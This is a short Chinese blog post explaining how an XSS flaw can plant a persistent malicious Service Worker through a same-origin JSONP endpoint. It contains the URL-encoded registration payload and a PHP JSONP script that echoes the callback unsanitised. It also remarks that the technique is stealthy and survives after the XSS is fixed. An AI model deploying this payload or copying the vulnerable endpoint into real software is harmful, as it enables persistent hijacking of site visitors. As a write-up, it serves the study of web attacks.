来源:http://www.mottoin.com/95058.html

来源:https://www.owasp.org/images/3/35/2017-04-20-JSONPXSS.pdf

 

ServiceWorkers 看完好像需要三个条件。 1.只在 HTTPS 下工作 2.安装ServiceWorker的脚本需要当前域下,且返回的 content-type 包含 /javascript。(也就是一个jsonp)。3.一个xss

 

先用xss种下ServiceWorkers

被xss的页面-->xss.html

<script>
navigator.serviceWorker.register("/x0day/jsonp.php?callback=onfetch%3Dfunction(e)%7B%0Ae.respondWith(new%20Response(%27%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%27%2C%7Bheaders%3A%20%7B%27Content-Type%27%3A%27text%2Fhtml%27%7D%7D))%0A%7D%2F%2F");
</script>

  

同域下存在jsonp的地方,返回的content-type必须包含"/javascript" ,用php写一个;

<?php
	header('Content-type: text/javascript');
    $arr=array('a'=>1,'b'=>2,'c'=>3,'d'=>4,'e'=>5);
    $result=json_encode($arr);
    $callback=$_GET['callback'];
    echo $callback."($result)";
?>

  

 

 

这时候访问jsonp下的路径都能触发这个xss,也就是 https://y3d.pw/x0day/

 

 

 

 

 

相对的直接把response返回的内容直接替换成脚本比较暴力,容易被发现,可以参考长短短写的替换某个js连接。

这种xss的利用方式隐藏性较好,即使xss被补上去了,之前访问过的人还是能触发。

 

posted on 2017-08-17 14:24  羊小弟  阅读(438)  评论(0编辑  收藏  举报